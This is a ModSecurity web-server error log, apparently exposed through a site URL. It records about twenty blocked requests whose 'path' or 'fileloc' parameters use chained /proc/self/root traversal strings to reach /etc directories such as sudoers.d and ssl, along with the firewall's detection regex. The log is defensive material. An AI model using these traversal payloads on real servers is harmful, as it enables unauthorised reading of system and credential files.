https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:34:05.075260 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:58958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi7Y6lpbStxTqkSktrMAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:34:06.249274 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:58966] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi7rABkC4fWIHEf8HpFAAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:34:08.775161 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.243.203:58970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi8AlT9VtDQc7bgUywCAAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:34:13.515046 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:58980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi9Y6lpbStxTqkSktrNgAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:34:14.735043 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.243.203:36650] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi9o6lpbStxTqkSktrNwAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:34:17.171056 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:36664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi-dSswJuvopo3lOhdaQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:34:19.642596 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:36680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi-9SswJuvopo3lOhdbQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:35:01.046458 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.243.203:47000] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjJRXjF1vJNtV6CWr0uAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:35:02.695797 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:41948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjJo6lpbStxTqkSktrQgAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:35:03.854596 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.243.203:41958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjJ46lpbStxTqkSktrQwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:35:39.170499 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:41964] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjS3bQATo66fKoS7xOJwAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:35:42.483046 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.243.203:49778] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjTnbQATo66fKoS7xOKgAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:35:44.926640 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:49782] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjULysWC90G-1nBrBEOgAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:35:52.291495 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:47652] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjWLABkC4fWIHEf8HpcAAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:35:54.900671 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.241.46:46224] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjWRXjF1vJNtV6CWr0xQAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:35:55.955619 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:49792] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjW_9ocpUE4ed4uDzuWwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:35:57.228242 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:35894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjXXjZBu2q05ozVU9W6gAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:00.411044 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.241.46:46226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjYHjZBu2q05ozVU9W8AAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:01.683238 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:44712] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjYbABkC4fWIHEf8HpcgAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:05.262397 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:44718] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjZXjZBu2q05ozVU9W9wAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:06.554770 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.241.46:44734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjZglT9VtDQc7bgUywNAAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:08.847011 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:44746] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjaP9ocpUE4ed4uDzuYgAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
